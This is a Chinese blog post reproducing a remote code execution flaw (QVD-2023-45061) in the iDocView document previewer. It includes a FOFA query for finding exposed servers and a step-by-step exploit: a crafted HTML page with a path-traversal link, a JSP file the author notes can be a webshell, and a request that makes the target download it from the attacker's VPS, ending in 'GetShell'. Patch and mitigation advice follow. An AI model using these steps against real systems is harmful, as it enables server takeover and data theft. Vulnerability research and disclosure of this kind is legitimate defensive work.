I Doc View在线文档预览系统RCE漏洞(QVD-2023-45061)

0x01 产品简介

iDocView是一个在线文档解析应用,旨在提供便捷的文件查看和编辑服务。

0x02 漏洞概述

漏洞成因

本次漏洞出现在在线文档解析应用中的远程页面缓存功能。具体问题在于该应用未能对用户输入的URL进行充分的安全验证,从而导致存在安全隐患。攻击者可通过构造特殊的URL,引诱应用下载恶意文件。

利用特征

攻击者利用该漏洞的关键在于使用具有远程页面缓存功能的接口,在参数中填写预先准备的包含恶意文件的URL。此类请求能够绕过正常的安全检查,使得服务器下载并处理恶意内容。漏洞的触发会返回特定的响应状态和内容类型条件,攻击者可通过自动化脚本进行检测和利用。

漏洞影响

该漏洞的利用可能导致服务器被远程控制、敏感数据泄露等等。漏洞的存在不仅威胁到该应用服务器的安全性,还可能成为更广泛网络安全事件的触发点。建议受影响的用户尽快采取必要的安全措施,以防范潜在的安全风险。

0x03 影响范围

iDocView < 13.10.1_20231115

0x04 复现环境

FOFA:title=="在线文档预览 - I Doc View"

0x05 漏洞复现

VPS上构造一个携带恶意link[href]的html文件,里面的link指向你的恶意文件

构造index.html

复制代码
<!DOCTYPE html>
<html lang="en">
<head>
    <title>test</title>
</head>
<body>
  <link href="/..\..\..\docview\test.jsp">
</body>
</html>

构造恶意文件

复制代码
vi '..\..\..\docview\test.jsp'


<%out.print("test");%>      #可以是马子

python开启一个http服务器,发送请求

复制代码
http://your-ip/html/2word?url=http://VPSip/index.html

当两个请求都响应200时会下载一个word文件,表示利用成功

验证

GetShell

0x06 修复建议

目前官方已发布安全修复版本,受影响用户可以自行更新或者联系相关技术支持获取最新版本或补丁修复漏洞。

https://api.idocv.com

缓解措施

隔离该系统对外访问,仅允许受信任网络或者用户访问。

拦截受影响Api接口的请求访问。

相关推荐
曹天骄41 分钟前
OpenResty 源站安全隔离设计在边缘计算架构中的工程实践
安全·边缘计算·openresty
IT研究所1 小时前
信创浪潮下 ITSM 的价值重构与实践赋能
大数据·运维·人工智能·安全·低代码·重构·自动化
Guheyunyi2 小时前
电气安全管理系统:筑牢现代用电安全的智能防线
大数据·人工智能·科技·安全·架构·能源
lingggggaaaa2 小时前
安全工具篇&魔改二开&CheckSum8算法&Beacon密钥&Stager流量&生成机制
学习·算法·安全·web安全·网络安全·免杀对抗
小白电脑技术2 小时前
Lucky中CorazaWAF的OWASP核心规则集功能
服务器·网络·安全
TDengine (老段)2 小时前
TDengine TSDB 3.4.0.0 上线:虚拟表、流计算性能显著提升,安全能力全面进阶
大数据·数据库·物联网·安全·时序数据库·tdengine·涛思数据
佟以冬3 小时前
Wireshark抓包基础
网络·测试工具·安全·网络安全·wireshark
阿猿收手吧!3 小时前
【C++】无锁原子栈:CAS实现线程安全
开发语言·c++·安全
ZeroNews内网穿透4 小时前
本地搭建 Clawdbot + ZeroNews 访问
网络·安全·web安全·clawdbot
智驱力人工智能4 小时前
无人机目标检测 低空安全治理的工程实践与价值闭环 无人机缺陷识别 农业无人机作物长势分析系统 森林防火无人机火点实时识别
人工智能·opencv·安全·yolo·目标检测·无人机·边缘计算